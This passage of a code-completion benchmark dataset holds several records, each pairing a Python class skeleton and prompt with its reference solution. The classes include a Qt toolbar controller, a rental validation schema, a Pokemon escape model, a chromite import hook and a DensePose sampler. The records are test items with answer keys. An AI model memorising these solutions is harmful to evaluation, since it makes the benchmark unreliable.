_createJumpToPathActionSlot(self, action): Creates a slot which directly jumps to the associated path in the history.\n\n<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n<|end_body_3|>\n", "revision_id": "958fda4f3064f9f6b2034da396a20ac9d9abd52f", "skeleton": "<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\"\"\"\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n", "source": "the_stack_v2_python_sparse", "source_path": "src/datafinder/gui/user/controller/repository/toolbar.py", "source_repo": "DLR-SC/DataFinder", "split": "test", "star_events_count": 9} {"blob_id": "92a023b85d6e7609e1d68e60476b0b0696823790", "bodies": ["if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\nelif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\nif 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')", "if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\nif 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')"], "bodies_text": "<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RentalSchema", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000173", "length_bytes": 6177, "license_type": "permissive", "methods": [{"docstring": "Asserts that when a rental is complete both the price and end time are included.", "name": "assert_end_time_with_price", "signature": "def assert_end_time_with_price(self, data, **kwargs)"}, {"docstring": "Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.", "name": "assert_url_included_with_foreign_key", "signature": "def assert_url_included_with_foreign_key(self, data, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001353", "prompt": "Implement the Python class `RentalSchema` described below.\n\nClass description:\nImplement the RentalSchema class.\n\nMethod signatures and docstrings:\n- def assert_end_time_with_price(self, data, **kwargs): Asserts that when a rental is complete both the price and end time are included.\n- def assert_url_included_with_foreign_key(self, data, **kwargs): Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.", "prompted_full_text": "Implement the Python class `RentalSchema` described below.\n\nClass description:\nImplement the RentalSchema class.\n\nMethod signatures and docstrings:\n- def assert_end_time_with_price(self, data, **kwargs): Asserts that when a rental is complete both the price and end time are included.\n- def assert_url_included_with_foreign_key(self, data, **kwargs): Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\n\n<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "revision_id": "fc6f9230e4701cbddcb16d7257fddb9ff08bddb9", "skeleton": "<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RentalSchema:\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n", "source": "the_stack_v2_python_sparse", "source_path": "server/serializer/models.py", "source_repo": "dragorhast/server", "split": "test", "star_events_count": 6} {"blob_id": "833716797f678f63fa8928fcf84e27d209a85b55", "bodies": ["self._pokemon = pokemon\nself._opponent_pokemon = opponent_pokemon\nself._is_run_successful = None", "if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\nreturn self._is_run_successful"], "bodies_text": "<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "class_docstring": "Represents the attempt to run from a battle.", "class_name": "RunActionModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000174", "length_bytes": 1022, "license_type": "no_license", "methods": [{"docstring": "Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.", "name": "__init__", "signature": "def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None"}, {"docstring": "Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.", "name": "is_run_successful", "signature": "def is_run_successful(self) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004369", "prompt": "Implement the Python class `RunActionModel` described below.\n\nClass description:\nRepresents the attempt to run from a battle.\n\nMethod signatures and docstrings:\n- def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None: Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\n- def is_run_successful(self) -> None: Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.", "prompted_full_text": "Implement the Python class `RunActionModel` described below.\n\nClass description:\nRepresents the attempt to run from a battle.\n\nMethod signatures and docstrings:\n- def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None: Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\n- def is_run_successful(self) -> None: Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\n\n<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "revision_id": "dfff995e3e50a8cfa56af73d93de82c427bfa2f5", "skeleton": "<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n", "source": "the_stack_v2_python_sparse", "source_path": "src/models/battle/run_action_model.py", "source_repo": "J-GG/Pymon", "split": "test", "star_events_count": 0} {"blob_id": "3f4019bbc16e5b60b26cf210ba42dce261acd493", "bodies": ["if fullname == 'chromite' and (not self._loading):\n return self\nreturn None", "path = os.path.dirname(os.path.realpath(__file__))\nwhile not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\nglobal CHROMITE_PATH\nCHROMITE_PATH = path + '/'\npath, mod = os.path.split(path)\nsys.path.insert(0, path)\nself._loading = True\ntry:\n return __import__(mod)\nfinally:\n sys.path.remove(path)\n self._loading = False"], "bodies_text": "<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "class_docstring": "Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.", "class_name": "ChromiteImporter", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000175", "length_bytes": 5735, "license_type": "permissive", "methods": [{"docstring": "Handle the 'chromite' module", "name": "find_module", "signature": "def find_module(self, fullname, _path=None)"}, {"docstring": "Return our cache of the 'chromite' module", "name": "load_module", "signature": "def load_module(self, _fullname)"}], "n_methods": 2, "prompt": "Implement the Python class `ChromiteImporter` described below.\n\nClass description:\nVirtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\n\nMethod signatures and docstrings:\n- def find_module(self, fullname, _path=None): Handle the 'chromite' module\n- def load_module(self, _fullname): Return our cache of the 'chromite' module", "prompted_full_text": "Implement the Python class `ChromiteImporter` described below.\n\nClass description:\nVirtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\n\nMethod signatures and docstrings:\n- def find_module(self, fullname, _path=None): Handle the 'chromite' module\n- def load_module(self, _fullname): Return our cache of the 'chromite' module\n\n<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/chromite/scripts/wrapper.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "39286c7d7d038c205e614719750c8cf1ac45a85d", "bodies": ["super().__init__(count_per_class)\nself.confidence_channel = confidence_channel\nself.search_count_multiplier = search_count_multiplier\nself.search_proportion = search_proportion\nassert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'", "k = values.shape[1]\nif k == count:\n index_sample = list(range(k))\nelse:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\nreturn index_sample", "converter = ToChartResultConverterWithConfidences\nchart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\nlabels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\ndp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\nreturn (labels, dp_result)"], "bodies_text": "<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "class_docstring": "Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.", "class_name": "DensePoseConfidenceBasedSampler", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = 